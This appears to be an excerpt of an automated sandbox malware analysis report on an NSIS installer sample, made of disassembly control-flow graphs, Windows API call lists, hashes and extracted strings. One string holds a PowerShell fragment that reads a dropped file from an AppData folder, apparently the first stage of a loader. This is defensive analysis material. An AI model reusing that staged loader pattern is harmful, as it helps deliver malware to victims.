                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                            • String ID: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde
                                                                                                                                                            • API String ID: 542301482-4177089788
                                                                                                                                                            • Opcode ID: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
                                                                                                                                                            • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                                                                                                                            • Opcode Fuzzy Hash: df36e5e89259041d68a58c4485740a5fc484dee9eaff443b08a8b6a32abbd60f
                                                                                                                                                            • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                                                                                                            APIs
                                                                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040293F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                            • Opcode ID: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
                                                                                                                                                            • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                                                                                                                            • Opcode Fuzzy Hash: 7987dc06055d2fcbd6de0c389dd755b94e4b1d186a0c9c18156fcbaf8ea50e81
                                                                                                                                                            • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 202 403fc1-403fd3 203 403fd9-403fdf 202->203 204 40413a-404149 202->204 203->204 205 403fe5-403fee 203->205 206 404198-4041ad 204->206 207 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 204->207 210 403ff0-403ffd SetWindowPos 205->210 211 404003-40400a 205->211 208 4041ed-4041f2 call 40450c 206->208 209 4041af-4041b2 206->209 207->206 221 4041f7-404212 208->221 213 4041b4-4041bf call 401389 209->213 214 4041e5-4041e7 209->214 210->211 216 40400c-404026 ShowWindow 211->216 217 40404e-404054 211->217 213->214 238 4041c1-4041e0 SendMessageW 213->238 214->208 220 40448d 214->220 222 404127-404135 call 404527 216->222 223 40402c-40403f GetWindowLongW 216->223 224 404056-404068 DestroyWindow 217->224 225 40406d-404070 217->225 227 40448f-404496 220->227 234 404214-404216 call 40140b 221->234 235 40421b-404221 221->235 222->227 223->222 236 404045-404048 ShowWindow 223->236 228 40446a-404470 224->228 230 404072-40407e SetWindowLongW 225->230 231 404083-404089 225->231 228->220 241 404472-404478 228->241 230->227 231->222 237 40408f-40409e GetDlgItem 231->237 234->235 242 404227-404232 235->242 243 40444b-404464 DestroyWindow EndDialog 235->243 236->217 244 4040a0-4040b7 SendMessageW IsWindowEnabled 237->244 245 4040bd-4040c0 237->245 238->227 241->220 246 40447a-404483 ShowWindow 241->246 242->243 247 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 242->247 243->228 244->220 244->245 249 4040c2-4040c3 245->249 250 4040c5-4040c8 245->250 246->220 274 404287-40428c 247->274 275 40428f-4042cb ShowWindow KiUserCallbackDispatcher call 4044e2 EnableWindow 247->275 252 4040f3-4040f8 call 404499 249->252 253 4040d6-4040db 250->253 254 4040ca-4040d0 250->254 252->222 257 404111-404121 SendMessageW 253->257 259 4040dd-4040e3 253->259 254->257 258 4040d2-4040d4 254->258 257->222 258->252 262 4040e5-4040eb call 40140b 259->262 263 4040fa-404103 call 40140b 259->263 272 4040f1 262->272 263->222 271 404105-40410f 263->271 271->272 272->252 274->275 278 4042d0 275->278 279 4042cd-4042ce 275->279 280 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404302-404313 SendMessageW 280->281 282 404315 280->282 283 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 281->283 282->283 283->221 294 404360-404362 283->294 294->221 295 404368-40436c 294->295 296 40438b-40439f DestroyWindow 295->296 297 40436e-404374 295->297 296->228 298 4043a5-4043d2 CreateDialogParamW 296->298 297->220 299 40437a-404380 297->299 298->228 301 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->301 299->221 300 404386 299->300 300->220 301->220 306 404431-404444 ShowWindow call 40450c 301->306 308 404449 306->308 308->228
                                                                                                                                                            APIs
                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                                                                                                            • ShowWindow.USER32(?), ref: 0040401D
                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                                                                                                            • DestroyWindow.USER32 ref: 0040405C
                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00404094
                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042A8
                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 004042C3
                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                                                                                                            • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                                                                                                            • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 121052019-0
                                                                                                                                                            • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                                                                                                            • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                                                                                                            • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                                                                                                            • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 309 403c13-403c2b call 406935 312 403c2d-403c3d call 406488 309->312 313 403c3f-403c76 call 40640f 309->313 321 403c99-403cc2 call 403ee9 call 405f18 312->321 317 403c78-403c89 call 40640f 313->317 318 403c8e-403c94 lstrcatW 313->318 317->318 318->321 327 403d54-403d5c call 405f18 321->327 328 403cc8-403ccd 321->328 333 403d6a-403d8f LoadImageW 327->333 334 403d5e-403d65 call 40657e 327->334 328->327 329 403cd3-403ced call 40640f 328->329 335 403cf2-403cfb 329->335 337 403e10-403e18 call 40140b 333->337 338 403d91-403dc1 RegisterClassW 333->338 334->333 335->327 339 403cfd-403d01 335->339 352 403e22-403e2d call 403ee9 337->352 353 403e1a-403e1d 337->353 342 403dc7-403e0b SystemParametersInfoW CreateWindowExW 338->342 343 403edf 338->343 340 403d13-403d1f lstrlenW 339->340 341 403d03-403d10 call 405e3d 339->341 347 403d21-403d2f lstrcmpiW 340->347 348 403d47-403d4f call 405e10 call 406541 340->348 341->340 342->337 346 403ee1-403ee8 343->346 347->348 351 403d31-403d3b GetFileAttributesW 347->351 348->327 355 403d41-403d42 call 405e5c 351->355 356 403d3d-403d3f 351->356 362 403e33-403e4d ShowWindow call 4068c5 352->362 363 403eb6-403eb7 call 405699 352->363 353->346 355->348 356->348 356->355 370 403e59-403e6b GetClassInfoW 362->370 371 403e4f-403e54 call 4068c5 362->371 366 403ebc-403ebe 363->366 368 403ec0-403ec6 366->368 369 403ed8-403eda call 40140b 366->369 368->353 376 403ecc-403ed3 call 40140b 368->376 369->343 374 403e83-403ea6 DialogBoxParamW call 40140b 370->374 375 403e6d-403e7d GetClassInfoW RegisterClassW 370->375 371->370 379 403eab-403eb4 call 403b63 374->379 375->374 376->353 379->346
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                                                                                                              • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                                                                                                            • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\87h216Snb7.exe",00008001), ref: 00403C94
                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403D14
                                                                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                                                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D32
                                                                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis), ref: 00403D7B
                                                                                                                                                              • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                                                                                                            • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                                                                                                            • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                            • String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                            • API String ID: 1975747703-4265789651
                                                                                                                                                            • Opcode ID: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                                                                                                                            • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                                                                                                            • Opcode Fuzzy Hash: b628336323bb02343b5fb0529852f76f357befb3686fccd2f1025f323f731d9b
                                                                                                                                                            • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 383 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406031 386 4030f2-4030f7 383->386 387 4030fc-40312a call 406541 call 405e5c call 406541 GetFileSize 383->387 388 4032d2-4032d6 386->388 395 403130 387->395 396 403215-403223 call 40303e 387->396 398 403135-40314c 395->398 402 403225-403228 396->402 403 403278-40327d 396->403 400 403150-403159 call 4034be 398->400 401 40314e 398->401 409 40327f-403287 call 40303e 400->409 410 40315f-403166 400->410 401->400 405 40322a-403242 call 4034d4 call 4034be 402->405 406 40324c-403276 GlobalAlloc call 4034d4 call 4032d9 402->406 403->388 405->403 433 403244-40324a 405->433 406->403 431 403289-40329a 406->431 409->403 415 4031e2-4031e6 410->415 416 403168-40317c call 405fec 410->416 420 4031f0-4031f6 415->420 421 4031e8-4031ef call 40303e 415->421 416->420 430 40317e-403185 416->430 427 403205-40320d 420->427 428 4031f8-403202 call 406a22 420->428 421->420 427->398 432 403213 427->432 428->427 430->420 436 403187-40318e 430->436 437 4032a2-4032a7 431->437 438 40329c 431->438 432->396 433->403 433->406 436->420 439 403190-403197 436->439 440 4032a8-4032ae 437->440 438->437 439->420 441 403199-4031a0 439->441 440->440 442 4032b0-4032cb SetFilePointer call 405fec 440->442 441->420 443 4031a2-4031c2 441->443 446 4032d0 442->446 443->403 445 4031c8-4031cc 443->445 447 4031d4-4031dc 445->447 448 4031ce-4031d2 445->448 446->388 447->420 449 4031de-4031e0 447->449 448->432 448->447 449->420
                                                                                                                                                            APIs
                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004030B3
                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                                                                                                              • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                                                                                                              • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                                                                                                                                            Strings
                                                                                                                                                            • "C:\Users\user\Desktop\87h216Snb7.exe", xrefs: 004030A8
                                                                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                                                                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004030A9
                                                                                                                                                            • soft, xrefs: 00403190
                                                                                                                                                            • Error launching installer, xrefs: 004030F2
                                                                                                                                                            • C:\Users\user\Desktop, xrefs: 004030FD, 00403102, 00403108
                                                                                                                                                            • Null, xrefs: 00403199
                                                                                                                                                            • Inst, xrefs: 00403187
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                            • String ID: "C:\Users\user\Desktop\87h216Snb7.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                            • API String ID: 2803837635-339472620
                                                                                                                                                            • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                            • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                                                                                                            • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                                                                                            • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 450 40657e-406587 451 406589-406598 450->451 452 40659a-4065b4 450->452 451->452 453 4067c4-4067ca 452->453 454 4065ba-4065c6 452->454 455 4067d0-4067dd 453->455 456 4065d8-4065e5 453->456 454->453 457 4065cc-4065d3 454->457 459 4067e9-4067ec 455->459 460 4067df-4067e4 call 406541 455->460 456->455 458 4065eb-4065f4 456->458 457->453 461 4067b1 458->461 462 4065fa-40663d 458->462 460->459 464 4067b3-4067bd 461->464 465 4067bf-4067c2 461->465 466 406643-40664f 462->466 467 406755-406759 462->467 464->453 465->453 468 406651 466->468 469 406659-40665b 466->469 470 40675b-406762 467->470 471 40678d-406791 467->471 468->469 474 406695-406698 469->474 475 40665d-406683 call 40640f 469->475 472 406772-40677e call 406541 470->472 473 406764-406770 call 406488 470->473 476 4067a1-4067af lstrlenW 471->476 477 406793-40679c call 40657e 471->477 486 406783-406789 472->486 473->486 481 40669a-4066a6 GetSystemDirectoryW 474->481 482 4066ab-4066ae 474->482 491 406689-406690 call 40657e 475->491 492 40673d-406740 475->492 476->453 477->476 487 406738-40673b 481->487 488 4066c0-4066c4 482->488 489 4066b0-4066bc GetWindowsDirectoryW 482->489 486->476 493 40678b 486->493 487->492 494 40674d-406753 call 4067ef 487->494 488->487 490 4066c6-4066e4 488->490 489->488 496 4066e6-4066ec 490->496 497 4066f8-406710 call 406935 490->497 491->487 492->494 499 406742-406748 lstrcatW 492->499 493->494 494->476 503 4066f4-4066f6 496->503 507 406712-406725 SHGetPathFromIDListW CoTaskMemFree 497->507 508 406727-406730 497->508 499->494 503->497 505 406732-406736 503->505 505->487 507->505 507->508 508->490 508->505
                                                                                                                                                            APIs
                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004066A0
                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004066B6
                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406714
                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 00406748
                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,matrices,?,?,00000000,00000000,00418EC0,00000000), ref: 004067A2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                            • String ID: "$redeemership=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Torsionsaffjedring.Une';$Tilta$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$matrices
                                                                                                                                                            • API String ID: 4024019347-1284859393
                                                                                                                                                            • Opcode ID: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
                                                                                                                                                            • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                                                                                                            • Opcode Fuzzy Hash: fc1dd504962f454d72de7fc8bd3fa5b90e0c752258918fd1551a188d423c3a78
                                                                                                                                                            • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 573 401794-4017b9 call 402dcb call 405e87 578 4017c3-4017d5 call 406541 call 405e10 lstrcatW 573->578 579 4017bb-4017c1 call 406541 573->579 585 4017da-4017db call 4067ef 578->585 579->585 588 4017e0-4017e4 585->588 589 4017e6-4017f0 call 40689e 588->589 590 401817-40181a 588->590 598 401802-401814 589->598 599 4017f2-401800 CompareFileTime 589->599 592 401822-40183e call 406031 590->592 593 40181c-40181d call 40600c 590->593 600 401840-401843 592->600 601 4018b2-4018db call 4055c6 call 4032d9 592->601 593->592 598->590 599->598 602 401894-40189e call 4055c6 600->602 603 401845-401883 call 406541 * 2 call 40657e call 406541 call 405ba1 600->603 615 4018e3-4018ef SetFileTime 601->615 616 4018dd-4018e1 601->616 613 4018a7-4018ad 602->613 603->588 636 401889-40188a 603->636 617 402c58 613->617 619 4018f5-401900 CloseHandle 615->619 616->615 616->619 621 402c5a-402c5e 617->621 622 401906-401909 619->622 623 402c4f-402c52 619->623 625 40190b-40191c call 40657e lstrcatW 622->625 626 40191e-401921 call 40657e 622->626 623->617 631 401926-4023c7 call 405ba1 625->631 626->631 631->621 639 402953-40295a 631->639 636->613 638 40188c-40188d 636->638 638->602 639->623
                                                                                                                                                            APIs
                                                                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde,?,?,00000031), ref: 004017D5
                                                                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,%Konstituerende176%\presatisfaction,%Konstituerende176%\presatisfaction,00000000,00000000,%Konstituerende176%\presatisfaction,C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Amidoaldehyde,?,?,00000031), ref: 004017FA
                                                                                                                                                              • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
